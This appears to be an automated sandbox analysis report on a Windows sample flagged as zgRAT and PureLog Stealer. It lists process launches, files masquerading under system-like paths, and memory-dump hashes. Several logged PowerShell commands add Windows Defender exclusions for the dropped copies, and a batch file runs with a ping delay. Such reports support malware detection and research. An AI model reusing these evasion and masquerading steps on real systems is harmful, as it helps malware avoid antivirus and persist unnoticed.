                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 66%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:24
                                                                                                                Start time:03:17:08
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Recovery\ctfmon.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Recovery\ctfmon.exe
                                                                                                                Imagebase:0xde0000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:26
                                                                                                                Start time:03:17:09
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                                                                                                                Imagebase:0xc40000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 66%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:28
                                                                                                                Start time:03:17:09
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                                                                                                                Imagebase:0x950000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:32
                                                                                                                Start time:03:17:11
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                Wow64 process (32bit):false
Commandline: C:\Users\user\Desktop\LzmJLVB41K.exe
Imagebase: 0x9c0000
File size: 1'998'336 bytes
MD5 hash: 2D756772BC00E5778D794C107358DDF7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 33
Start time: 03:17:11
Start date: 18/11/2024
Path: C:\Users\user\Desktop\LzmJLVB41K.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\LzmJLVB41K.exe
Imagebase: 0x230000
File size: 1'998'336 bytes
MD5 hash: 2D756772BC00E5778D794C107358DDF7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 34
Start time: 03:17:13
Start date: 18/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 35
Start time: 03:17:13
Start date: 18/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ctfmon.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 36
Start time: 03:17:13
Start date: 18/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 37
Start time: 03:17:13
Start date: 18/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 38
Start time: 03:17:13
Start date: 18/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 39
Start time: 03:17:14
Start date: 18/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 40
Start time: 03:17:14
Start date: 18/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 41
Start time: 03:17:14
Start date: 18/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 42
Start time: 03:17:14
Start date: 18/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 43
Start time: 03:17:14
Start date: 18/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\LzmJLVB41K.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 44
Start time: 03:17:14
Start date: 18/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 45
Start time: 03:17:14
Start date: 18/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 46
Start time: 03:17:14
Start date: 18/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat"
Imagebase: 0x7ff6629d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 47
Start time: 03:17:14
Start date: 18/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 48
Start time: 03:17:16
Start date: 18/11/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp 65001
Imagebase: 0x7ff60e5d0000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 49
Start time: 03:17:16
Start date: 18/11/2024
Path: C:\Windows\System32\PING.EXE
Wow64 process (32bit): false
Commandline: ping -n 10 localhost
Imagebase: 0x7ff7f3360000
File size: 22'528 bytes
MD5 hash: 2F46799D79D22AC72C241EC0322B011D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 51
Start time: 03:17:19
Start date: 18/11/2024
Path: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe"
Imagebase: 0x190000
File size: 1'998'336 bytes
MD5 hash: 2D756772BC00E5778D794C107358DDF7
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 66%, ReversingLabs
Has exited: true

Target ID: 52
Start time: 03:17:25
Start date: 18/11/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                Imagebase:0x7ff717f30000
                                                                                                                File size:496'640 bytes
                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:53
                                                                                                                Start time:03:17:27
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                                                                                                                Imagebase:0x160000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:54
                                                                                                                Start time:03:17:28
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Recovery\ctfmon.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Recovery\ctfmon.exe"
                                                                                                                Imagebase:0x7ff7934f0000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8612963f6b8bb5deda9c338d8d2d0d514d79545c7a2eda0b26eca8cf15b8daed
                                                                                                                  • Instruction ID: 3670be11f36ae812771d65585fd9a2e489129b897a92b2559ad851e310bee6e4
                                                                                                                  • Opcode Fuzzy Hash: 8612963f6b8bb5deda9c338d8d2d0d514d79545c7a2eda0b26eca8cf15b8daed
                                                                                                                  • Instruction Fuzzy Hash: D7C1C030B18A468FE749DF58C0A56A8B7A1FF5A300F5441BAC14EC7A86DF78B861D7D0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 15af6b4f74a45f1085661b1679ba56d60e809f8a45970bdfabe7e29c9a0fd334
                                                                                                                  • Instruction ID: 3294a1ea0ef62b9f47a7e79018280742866685145f1ef41cab270d4f8d8ee730
                                                                                                                  • Opcode Fuzzy Hash: 15af6b4f74a45f1085661b1679ba56d60e809f8a45970bdfabe7e29c9a0fd334
                                                                                                                  • Instruction Fuzzy Hash: 2621B112F0C1978AF66566A928B50FD27909F82320F18157FD68DEA4C3DCDE7C617392
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c3088f6aaf30f11ce2d4fca04819603c916a8a14883ac554b62c61a4c5381de8
                                                                                                                  • Instruction ID: 65f0b1fa7c6b91ea64ff43e93b7b65ab8594f1169418cc3dbdd0e2fa4e7ed210
                                                                                                                  • Opcode Fuzzy Hash: c3088f6aaf30f11ce2d4fca04819603c916a8a14883ac554b62c61a4c5381de8
                                                                                                                  • Instruction Fuzzy Hash: E9914B35B0C6494FE764EA1894BA5FD37D0EF46320B0402BBD28EC75A3ED5CA8269781
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 11874d93f03d6f5b6cdffa79975a454a38e6f908191d2bae2de743119012ff69
                                                                                                                  • Instruction ID: 8f91c6ee90cb07c94a5382163b5e298cb573d0de72df4721ab56e4d4d5b71540
                                                                                                                  • Opcode Fuzzy Hash: 11874d93f03d6f5b6cdffa79975a454a38e6f908191d2bae2de743119012ff69
                                                                                                                  • Instruction Fuzzy Hash: 88A10430A0DA468FE749EB68D4A15A8B7E1FF16310F5441BAC14EC7683DE6CB861D790
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 42f44bd46a357e5279fc959607cbf155d6c95e803782f357eca26956c85d15fc
                                                                                                                  • Instruction ID: 06b2d63d239f98113892c3132a46f66169b83fd982bc37225cc1469e5b2d0865
                                                                                                                  • Opcode Fuzzy Hash: 42f44bd46a357e5279fc959607cbf155d6c95e803782f357eca26956c85d15fc
                                                                                                                  • Instruction Fuzzy Hash: DE914731B0C5494FE768DA1884B61BD37C0FF86310B0402BFD29EC75A6DE6CAD269B81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bc6be32531c884e55fd1c7314e8c81668993095652b9ff2c3695ef218fbe4343
                                                                                                                  • Instruction ID: 4e3de62a35d82ad00a7ee50ddd07442fdc86cfeea21d9cd07467962270984627
                                                                                                                  • Opcode Fuzzy Hash: bc6be32531c884e55fd1c7314e8c81668993095652b9ff2c3695ef218fbe4343
                                                                                                                  • Instruction Fuzzy Hash: 7F218112F4F1878AE779566818F51BC7A805F53351F1901BBDE8EE62C2DDCE2860F292
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4c105f9532dc9bdd64f0f846b0afbc48b087e3616ced84784b5bd9a234861b0c
                                                                                                                  • Instruction ID: b11429c1a7ba0242c7aefddce31e8cf9b3d2fa6553ff398194bb392dae4e5b3f
                                                                                                                  • Opcode Fuzzy Hash: 4c105f9532dc9bdd64f0f846b0afbc48b087e3616ced84784b5bd9a234861b0c
                                                                                                                  • Instruction Fuzzy Hash: AD812431B0CB464FE36C9A5894A117D7BE0EF87710B14057FD58EC3282DE6DB812A782
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 82beea26741aaaf63f63f81c537db9b0913896e291b527bd14b741b29d79239a
                                                                                                                  • Instruction ID: 8fba2ac5a6ecdcc294f0f0d0775c1e9e10f7ade6441ccb6c04230013da079e98
                                                                                                                  • Opcode Fuzzy Hash: 82beea26741aaaf63f63f81c537db9b0913896e291b527bd14b741b29d79239a
                                                                                                                  • Instruction Fuzzy Hash: 79713531A0DB424FE7689A2894E5479BBE4EF93310B14057FD58FC3293DD6DB8129B42
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7bb638891cd312c7875c2da61c46475a3645490c592a1673142be4cb033e904d
                                                                                                                  • Instruction ID: 6092969d8f196e146365e4967b0d921d61e1ba60fbc1368466cc194d93484142
                                                                                                                  • Opcode Fuzzy Hash: 7bb638891cd312c7875c2da61c46475a3645490c592a1673142be4cb033e904d
                                                                                                                  • Instruction Fuzzy Hash: 0B81D330B189864FE789DB64C4A16A8BBE1FF5A700F04457AC14EC7AC6DF7CB8619780
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 104791b966cda64b6fa06c1cf0ce188d5787200f4388ae56fb5cebb8f677b1ca
                                                                                                                  • Instruction ID: dd4851adb5c0e919d91e7708a5d2d3ea62985cdee4d888de63916261b5f9231c
                                                                                                                  • Opcode Fuzzy Hash: 104791b966cda64b6fa06c1cf0ce188d5787200f4388ae56fb5cebb8f677b1ca
                                                                                                                  • Instruction Fuzzy Hash: D371B030A0CA864FE749DB64C4A16A9BBA1FF56300F5441BAC14EC7687DF78B861DB81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 735c8275fb0f7de4ccf146209cf733fb1798875e34bce92e2ee3727c146de227
                                                                                                                  • Instruction ID: 4e350154c29327d355c7ef9294c7320a291a3b74e6b194b441cdba56c3b4d7b7
                                                                                                                  • Opcode Fuzzy Hash: 735c8275fb0f7de4ccf146209cf733fb1798875e34bce92e2ee3727c146de227
                                                                                                                  • Instruction Fuzzy Hash: DC71E43060CA868FE749DB28C4E05A8F7A0FF16310F5441BAC54EC7697DF68B861DB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8839f6e9927cefe3aad675b37428f14e077e406a5dceb248f599745c13412a60
                                                                                                                  • Instruction ID: ede19befc7720242dd78f7238b9c7f85d1f38adceadb21d0812631529d4a5a8f
                                                                                                                  • Opcode Fuzzy Hash: 8839f6e9927cefe3aad675b37428f14e077e406a5dceb248f599745c13412a60
                                                                                                                  • Instruction Fuzzy Hash: 73619030A0CB068FE364DB24D1E55B577E1FF46300B504A7EC58AC3A96CEB9B852DB45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9fc6fc4c997994edc80cc6cd36699b99a50c4342c545087c4b66a6426271ddc9
                                                                                                                  • Instruction ID: e1baf2986f1dbf90215312b362771bc9513fb3db0d503b36aecb85d5dd9cd700
                                                                                                                  • Opcode Fuzzy Hash: 9fc6fc4c997994edc80cc6cd36699b99a50c4342c545087c4b66a6426271ddc9
                                                                                                                  • Instruction Fuzzy Hash: A2514631B0DB454FE3699A28A4A907AB7E0EF47310B24067FD58FC2593DE6DB412D386
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2396316491.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348c0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: acd26a89f8dfd96a63add7a65b47002fd925cd6bef0879d47273adb705b901e8
                                                                                                                  • Instruction ID: 07e45e0adce9ed713cb9716cc390dfeb96d179dfeff29d3333f0de295b97a6ce
                                                                                                                  • Opcode Fuzzy Hash: acd26a89f8dfd96a63add7a65b47002fd925cd6bef0879d47273adb705b901e8
                                                                                                                  • Instruction Fuzzy Hash: C141F622B0CA551FE715B7FC60B66F9B7D5EF4A320B1805BBD04DD71A7ED28A8818284
Memory Dump Source
• Source File: 00000000.00000002.2396316491.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd348c0000_LzmJLVB41K.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aacf54786ccb6ccdc38faf70b253f34b169cf07ff9fb7654241189f0e80cfb1b
• Instruction ID: 461e6fcd8c57b1d2da351af7d6629bb0e09061ca5406956d7cea0dcc0eaddb8b
• Opcode Fuzzy Hash: aacf54786ccb6ccdc38faf70b253f34b169cf07ff9fb7654241189f0e80cfb1b
• Instruction Fuzzy Hash: A531F73130C9184FD768EB5CE89AAB977D0EF4632130541BBE58AC7166D911EC828781
Memory Dump Source
• Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c19c4b2960047de5b9109d69b2ecaf97146c3f6e54958b66284cb3d5719618af
• Instruction ID: e9ab6591cd4ab276e5e1f067987e2c908251af2e2eadfe13db456fda2b2b276b
• Opcode Fuzzy Hash: c19c4b2960047de5b9109d69b2ecaf97146c3f6e54958b66284cb3d5719618af
• Instruction Fuzzy Hash: 71411520B1C55A8FEB659A5884B06F877A1FF57300F1441BBD18ED7286DD3DAD849780
Memory Dump Source
• Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1a4cea9f64beac772139b463095015837e0b0b1137095734a1597bb2ddd44fdc
• Instruction ID: 4d5f407c9b650bd836691ffa3986f694f21a5483619672258aa0ee432003cd21
• Opcode Fuzzy Hash: 1a4cea9f64beac772139b463095015837e0b0b1137095734a1597bb2ddd44fdc
• Instruction Fuzzy Hash: E241823160C9098FDF88EF18C4A6AB4B7E1FF69310B04056AD04ED3582DE35F851CB81
Memory Dump Source
• Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5188eddc233bf1fb32280127f5e997de45fd3a989765410a8cd0bd486395faac
• Instruction ID: 19ec4fa9c4912665d1c42739cb2cdeeae88a3297c4a67707a40fcb4a7f81ff35
• Opcode Fuzzy Hash: 5188eddc233bf1fb32280127f5e997de45fd3a989765410a8cd0bd486395faac
• Instruction Fuzzy Hash: 8D41933270C9488FDF58EF18C4A5DA5B3E1FBAA310B0401AAD04ED3592DE35F845CB85
Memory Dump Source
